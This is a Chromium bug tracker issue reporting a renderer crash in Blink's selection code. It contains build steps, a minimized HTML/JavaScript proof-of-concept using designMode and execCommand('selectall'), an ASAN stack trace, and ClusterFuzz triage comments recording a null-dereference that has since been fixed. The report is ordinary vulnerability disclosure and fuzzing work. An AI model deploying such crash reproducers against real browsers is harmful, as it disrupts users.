Issue metadata
Sign in to add a comment
|
SelectAll can crash with fallback content in OBJECT
Reported by
cdsrc2...@gmail.com,
Apr 19 2018
|
||||||||||||||||||||||||
Issue description
UserAgent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Steps to reproduce the problem:
chrome Version: Version 68.0.3398.0 (Developer Build) (64-bit)
ubuntu version: 16.04
signal 11 SEGV_MAPERR 000000000011 in third_party/blink/renderer/core/dom/node.h
1.Get new version chrome:
a) Build source code
config args.gn file as below:
use_sanitizer_coverage = true
is_asan = true
is_debug = false
enable_nacl = false
treat_warnings_as_errors = false
ninja -j16 -C out/chrome_asan chrome
2.Build a mini web server.
I used python twisted module to build the webserver.
1) cp 1.html,1.mp3,1.1.xsl to webserver/res/
2) python webserver/web.py
3.
1) ./crhome http://127.0.0.1:8605/crash.html
2) And get "signal 11 SEGV_MAPERR 000000000011"
minimized poc:
<object alt="my image" g2="http://127.0.0.1:8605/res/1.xsl">
</object>
<object data="http://127.0.0.1:8605/res/1.html" type="application/html">
<script>
onload = function() {
__cass__0__=document.createElement('input');
document.body.appendChild(__cass__0__);
__cass__0__.type='month';
__cass__0__=document.createElement('u');
document.designMode='on';
document.execCommand('selectall');
try { var __cass__0__ = __cass__0__.hasPointerCapture(1); } catch(e) { }};
</script>
</object>
<object data="http://127.0.0.1:8605/res/1.mp3" type="application/css" >
alt : <a content="JLl" ></a>
</object>
What is the expected behavior?
What went wrong?
Received signal 11 SEGV_MAPERR 000000000011
#0 0x557334759471 in __interceptor_backtrace /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:3980:13
#1 0x55733ba3d41e in base::debug::StackTrace::StackTrace(unsigned long) /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/debug/stack_trace_posix.cc:808:41
#2 0x55733ba3c36d in base::debug::(anonymous namespace)::StackDumpSignalHandler(int, siginfo_t*, void*) /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/debug/stack_trace_posix.cc:334:3
#3 0x7f66d0ea5390 in __funlockfile ??:?
#4 0x7f66d0ea5390 in ?? ??:0
#5 0x5573459165a5 in GetFlag /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/dom/node.h:869:47
#6 0x5573459165a5 in isConnected /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/dom/node.h:548:0
#7 0x5573459165a5 in blink::Node::UpdateDistribution() /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/dom/node.cc:782:0
#8 0x557345bd23cd in blink::ComparePositions(blink::PositionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&, blink::PositionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/position.cc:401:28
#9 0x557345bf9d27 in blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > blink::(anonymous namespace)::ComputeAdjustedSelection<blink::EditingAlgorithm<blink::FlatTreeTraversal> >(blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> >, blink::EphemeralRangeTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/selection_adjuster.cc:51:29
#10 0x557345bf8360 in AdjustSelection<blink::EditingAlgorithm<blink::FlatTreeTraversal> > /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/selection_adjuster.cc:572:12
#11 0x557345bf8360 in blink::SelectionAdjuster::AdjustSelectionToAvoidCrossingEditingBoundaries(blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/selection_adjuster.cc:766:0
#12 0x557345c791e1 in ComputeVisibleSelection<blink::EditingAlgorithm<blink::FlatTreeTraversal> > /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/visible_selection.cc:269:7
#13 0x557345c791e1 in blink::VisibleSelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> >::CreateWithGranularity(blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&, blink::TextGranularity) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/visible_selection.cc:86:0
#14 0x557345c7b0b6 in Create /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/visible_selection.cc:61:10
#15 0x557345c7b0b6 in blink::CreateVisibleSelection(blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > const&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/visible_selection.cc:70:0
#16 0x557345bfedcb in blink::SelectionEditor::UpdateCachedVisibleSelectionInFlatTreeIfNeeded() const /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/selection_editor.cc:403:7
#17 0x557345bfea01 in blink::SelectionEditor::ComputeVisibleSelectionInFlatTree() const /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/selection_editor.cc:86:3
#18 0x557345b4a397 in ComputeVisibleSelectionInFlatTree /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/frame_selection.cc:127:29
#19 0x557345b4a397 in blink::FrameSelection::SelectionHasFocus() const /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/frame_selection.cc:410:0
#20 0x557345b4a7ef in blink::FrameSelection::IsHidden() const /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/frame_selection.cc:451:7
#21 0x557345b965d8 in CalcSelectionRangeAndSetSelectionState /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/layout_selection.cc:707:50
#22 0x557345b965d8 in blink::LayoutSelection::Commit() /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/editing/layout_selection.cc:779:0
#23 0x557346e5cc0a in blink::LayoutView::CommitPendingSelection() /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/layout/layout_view.cc:620:39
#24 0x55734739b8ef in blink::PaintLayerCompositor::UpdateIfNeededRecursiveInternal(blink::DocumentLifecycle::LifecycleState, blink::CompositingReasonsStats&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/paint/compositing/paint_layer_compositor.cc:248:16
#25 0x55734739b75a in blink::PaintLayerCompositor::UpdateIfNeededRecursiveInternal(blink::DocumentLifecycle::LifecycleState, blink::CompositingReasonsStats&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/paint/compositing/paint_layer_compositor.cc:230:13
#26 0x55734739b05d in blink::PaintLayerCompositor::UpdateIfNeededRecursive(blink::DocumentLifecycle::LifecycleState) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/paint/compositing/paint_layer_compositor.cc:187:3
#27 0x557345fba02c in blink::LocalFrameView::UpdateLifecyclePhasesInternal(blink::DocumentLifecycle::LifecycleState) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/frame/local_frame_view.cc:3272:36
#28 0x55734729aef7 in blink::PageAnimator::UpdateAllLifecyclePhases(blink::LocalFrame&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/page/page_animator.cc:100:9
#29 0x557345d4dbae in blink::WebViewImpl::UpdateLifecycle(blink::WebWidget::LifecycleUpdate) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/core/exported/web_view_impl.cc:1833:3
#30 0x557349855034 in UpdateVisualState /home/cowboy/chromium/src/out/chrome_asan_shared/../../content/renderer/render_widget.cc:1057:19
#31 0x557349855034 in non-virtual thunk to content::RenderWidget::UpdateVisualState(cc::LayerTreeHostClient::VisualStateUpdate) /home/cowboy/chromium/src/out/chrome_asan_shared/../../content/renderer/render_widget.cc:0:0
#32 0x55733ea48dc7 in cc::ProxyMain::BeginMainFrame(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >) /home/cowboy/chromium/src/out/chrome_asan_shared/../../cc/trees/proxy_main.cc:223:21
#33 0x55733ea5efde in Invoke<base::WeakPtr<cc::ProxyMain>, std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/bind_internal.h:447:12
#34 0x55733ea5efde in MakeItSo<void (cc::ProxyMain::*)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), base::WeakPtr<cc::ProxyMain>, std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/bind_internal.h:550:0
#35 0x55733ea5efde in void base::internal::Invoker<base::internal::BindState<void (cc::ProxyMain::*)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), base::WeakPtr<cc::ProxyMain>, base::internal::PassedWrapper<std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > >, void ()>::RunImpl<void (cc::ProxyMain::*)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), std::__1::tuple<base::WeakPtr<cc::ProxyMain>, base::internal::PassedWrapper<std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > >, 0ul, 1ul>(void (cc::ProxyMain::*&&)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), std::__1::tuple<base::WeakPtr<cc::ProxyMain>, base::internal::PassedWrapper<std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > >&&, std::__1::integer_sequence<unsigned long, 0ul, 1ul>) /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/bind_internal.h:604:0
#36 0x55733ba40db9 in Run /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/callback.h:95:12
#37 0x55733ba40db9 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/debug/task_annotator.cc:101:0
#38 0x55733a9b2028 in blink::scheduler::internal::ThreadControllerImpl::DoWork(blink::scheduler::internal::SequencedTaskSource::WorkType) /home/cowboy/chromium/src/out/chrome_asan_shared/../../third_party/blink/renderer/platform/scheduler/base/thread_controller_impl.cc:162:21
#39 0x55733ba40db9 in Run /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/callback.h:95:12
#40 0x55733ba40db9 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/debug/task_annotator.cc:101:0
#41 0x55733baa80c3 in base::MessageLoop::RunTask(base::PendingTask*) /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/message_loop/message_loop.cc:319:25
#42 0x55733baa9340 in DeferOrRunPendingTask /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/message_loop/message_loop.cc:329:5
#43 0x55733baa9340 in base::MessageLoop::DoWork() /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/message_loop/message_loop.cc:373:0
#44 0x55733bab18a0 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/message_loop/message_pump_default.cc:37:31
#45 0x55733bb2ebf1 in base::RunLoop::Run() /home/cowboy/chromium/src/out/chrome_asan_shared/../../base/run_loop.cc:130:14
#46 0x55734990ab8e in content::RendererMain(content::MainFunctionParams const&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../content/renderer/renderer_main.cc:248:23
#47 0x55733afecf6d in content::ContentMainRunnerImpl::Run() /home/cowboy/chromium/src/out/chrome_asan_shared/../../content/app/content_main_runner.cc:922:12
#48 0x55733b011af9 in service_manager::Main(service_manager::MainParams const&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../services/service_manager/embedder/main.cc:452:29
#49 0x55733afe7bb8 in content::ContentMain(content::ContentMainParams const&) /home/cowboy/chromium/src/out/chrome_asan_shared/../../content/app/content_main.cc:19:10
#50 0x5573347e22d3 in ChromeMain /home/cowboy/chromium/src/out/chrome_asan_shared/../../chrome/app/chrome_main.cc:101:12
#51 0x7f66ca106830 in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291:0
#52 0x55733470d02a in _start ??:0:0
r8: 0000000000000010 r9: 0000000000000002 r10: 00000000000000f0 r11: 0000000000000001
r12: 0000000000000000 r13: 00007f66bf5f7400 r14: 00007f66bf5f7400 r15: 00000fecd7ebee80
di: 000055734c83d5ac si: ffffffffffffffff bp: 00007fff6ae203d0 bx: 00007fff6ae20340
dx: 0000000000000000 ax: 000055734e134c00 cx: 00000aae69c26901 sp: 00007fff6ae20340
ip: 00005573459165a5 efl: 0000000000010246 cgf: 002b000000000033 erf: 0000000000000004
trp: 000000000000000e msk: 0000000000000000 cr2: 0000000000000011
[end of stack trace]
Calling _exit(1). Core file will not be generated.
Did this work before? N/A
Chrome version: Version 68.0.3398.0 (Developer Build) (64-bit) Channel: dev
OS Version: Ubuntu 16.04
Flash Version:
,
Apr 19 2018
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=6158165742452736.
,
Apr 19 2018
,
Apr 19 2018
Possible a duplicate of Issue 819549 .
,
Apr 20 2018
Detailed report: https://clusterfuzz.com/testcase?key=5746102687760384 Job Type: linux_asan_chrome_mp Platform Id: linux Crash Type: Null-dereference READ Crash Address: 0x000000000011 Crash State: blink::Node::UpdateDistribution blink::ComparePositions blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > bli Sanitizer: address (ASAN) Regressed: https://clusterfuzz.com/revisions?job=linux_asan_chrome_mp&range=540771:540772 Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=5746102687760384 See https://github.com/google/clusterfuzz-tools for more information.
,
Apr 20 2018
,
Apr 20 2018
,
May 2 2018
,
Jul 19
ClusterFuzz has detected this issue as fixed in range 575974:575975. Detailed report: https://clusterfuzz.com/testcase?key=5746102687760384 Job Type: linux_asan_chrome_mp Platform Id: linux Crash Type: Null-dereference READ Crash Address: 0x000000000011 Crash State: blink::Node::UpdateDistribution blink::ComparePositions blink::SelectionTemplate<blink::EditingAlgorithm<blink::FlatTreeTraversal> > bli Sanitizer: address (ASAN) Regressed: https://clusterfuzz.com/revisions?job=linux_asan_chrome_mp&range=540771:540772 Fixed: https://clusterfuzz.com/revisions?job=linux_asan_chrome_mp&range=575974:575975 Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=5746102687760384 See https://github.com/google/clusterfuzz-tools for more information. If you suspect that the result above is incorrect, try re-doing that job on the test case report page.
,
Aug 9
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||||
Comment 1 by ClusterFuzz
, Apr 19 2018